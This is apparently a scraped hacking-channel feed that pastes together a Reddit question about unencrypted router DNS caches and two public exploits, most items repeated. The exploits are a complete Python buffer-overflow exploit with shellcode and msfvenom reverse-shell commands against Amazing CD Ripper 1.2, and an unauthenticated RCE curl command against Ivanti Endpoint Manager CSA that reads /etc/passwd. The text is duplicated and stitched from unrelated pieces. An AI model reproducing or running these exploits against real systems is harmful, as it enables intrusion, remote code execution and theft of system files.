I invented this tool ([https://github.com/ki4jgt/Inertia](https://github.com/ki4jgt/Inertia)), and have been told numerous times that it's...
DNS Caches not encrypted
https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/
I am working on a testing of a small home based router. I can see that there is dns cache feature enabled on that device where user requests are cached. I have had read about DNSSEC before and I believe cache that is being stored locally on these small routers do not have encryption enabled. My specific questions are: 1. Is this an issue? Theoretically may be since cache responses that are stored in device are not encrypted. 2. Is DNSSEC only way to encrypt those responses? Thank you much in advance. submitted by /u/Creepy-Trust-9581 (https://www.reddit.com/user/Creepy-Trust-9581)
[link] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/
I am working on a testing of a small home based router. I can see that there is dns cache feature enabled on that device where user requests are cached. I have had read about DNSSEC before and I believe cache that is being stored locally on these small routers do not have encryption enabled. My specific questions are: 1. Is this an issue? Theoretically may be since cache responses that are stored in device are not encrypted. 2. Is DNSSEC only way to encrypt those responses? Thank you much in advance. submitted by /u/Creepy-Trust-9581 (https://www.reddit.com/user/Creepy-Trust-9581)
[link] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
DNS Caches not encrypted
I am working on a testing of a small home based router. I can see that there is dns cache feature enabled on that device where user requests are...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Amazing CD Ripper 1.2 Buffer Overflow
https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png Amazing CD Ripper version 1.2 suffers from a buffer overflow vulnerability.
MD5 |
___________________________
@hacking_Attack
@Hacking_Video
Amazing CD Ripper 1.2 Buffer Overflow
https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png Amazing CD Ripper version 1.2 suffers from a buffer overflow vulnerability.
MD5 |
109eebb49df171d38123922bad1203d3Download # Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow
# Exploit Author: Hejap Zairy
# Date: 03.08.2022
# Software Link: http://www.shelltoys.com/cd_ripper.exe
# Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe
# Tested Version: v1.2.1
# Tested on: Windows 10 64bit
# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Amazing CD Ripper and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'
# Author Code By Hejap Zairy
#CVE-2022-0x515
#!/usr/bin/env python
from pwn import *
buffer = "\x41" * 1016
# 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll)
push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll
nops = "\x90" * 15 #515 tshhh theardlooo love Malware
#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff"
#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff"
buf = b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer + push_esp + nops + buf + padding
try:
with open("0day_Hejap.txt","wb") as f:
print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("[-]File cannot be created")
# Proof and Exploit:
https://i.imgur.com/3r5sKNo.png Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Amazing CD Ripper 1.2 Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Ivanti Endpoint Manager CSA versions 4.5 and 4.6 suffer from an unauthenticated remote code execution vulnerability.
MD5 |
Download
# Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529
###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###
# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Ivanti Endpoint Manager CSA versions 4.5 and 4.6 suffer from an unauthenticated remote code execution vulnerability.
MD5 |
59d3bc20720bd412425b82923627b636Download
# Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529
###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###
# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.